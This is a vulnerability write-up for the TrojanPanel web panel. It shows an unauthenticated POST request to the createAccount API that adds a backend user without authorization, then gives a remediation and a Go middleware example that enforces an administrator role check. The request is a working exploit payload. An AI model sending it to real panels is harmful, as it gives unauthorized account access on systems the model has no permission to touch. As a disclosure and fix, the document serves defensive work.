TrojanPanel - unauthorized user creation
Had some spare time and found an authorization vulnerability.
Vulnerability description: an attacker can add a backend administrator user without any authorization.
As shown in the screenshot below, sending the following request through Burp is enough to add an administrator user:
POST /api/account/createAccount HTTP/1.1
Host: xx.xx.xx.xx:xxx
Content-Length: 165
Sec-Ch-Ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"quota":-1,"download":0,"upload":0,"username":"test02","pass":"qwe511402","roleId":2,"deleted":0,"expireTime":1964411864000,"createTime":"2023-04-09T05:57:44.830Z"}
After the request is sent, the user test02 is created successfully
and can log in to the backend, as shown in the screenshot below.
Impact: through this interface, an attacker can add a user to the backend.
Remediation: add an authorization check so that only system administrators are allowed to add users.
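The remediation above, as an added example that is not TrojanPanel's own code: a Go net/http middleware that gates the createAccount endpoint behind an authenticated system-administrator session, returning 401 without a session and 403 for a session that lacks the administrator role. The bearer-token session store, the role ids and the stand-in handler body are assumptions constructed for this example.

```go
package main
import (
	"encoding/json"
	"net/http"
	"strings"
)

const roleSysAdmin = 1 // assumed role id of a system administrator
// Constructed session store: bearer token -> role of the logged-in caller.
var sessionRole = map[string]int{"admin-token": roleSysAdmin, "user-token": 2}
// callerRole maps the Authorization header to a role; ok is false without a valid session.
func callerRole(r *http.Request) (role int, ok bool) {
	auth := r.Header.Get("Authorization")
	if !strings.HasPrefix(auth, "Bearer ") {
		return 0, false
	}
	role, ok = sessionRole[strings.TrimPrefix(auth, "Bearer ")]
	return role, ok
}

// requireSysAdmin is the missing check: no session -> 401, non-admin session -> 403.
func requireSysAdmin(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		role, ok := callerRole(r)
		if !ok {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		if role != roleSysAdmin {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next(w, r)
	}
}

// createAccount stands in for the real handler: it only checks the body has a username.
func createAccount(w http.ResponseWriter, r *http.Request) {
	var req struct{ Username string `json:"username"` }
	if json.NewDecoder(r.Body).Decode(&req) != nil || req.Username == "" {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	w.WriteHeader(http.StatusCreated)
}

func main() {
	http.Handle("/api/account/createAccount", requireSysAdmin(createAccount))
	http.ListenAndServe(":8080", nil)
}
```

The same check can be logged on every 401/403 so that repeated unauthenticated calls to account-management endpoints show up in detection.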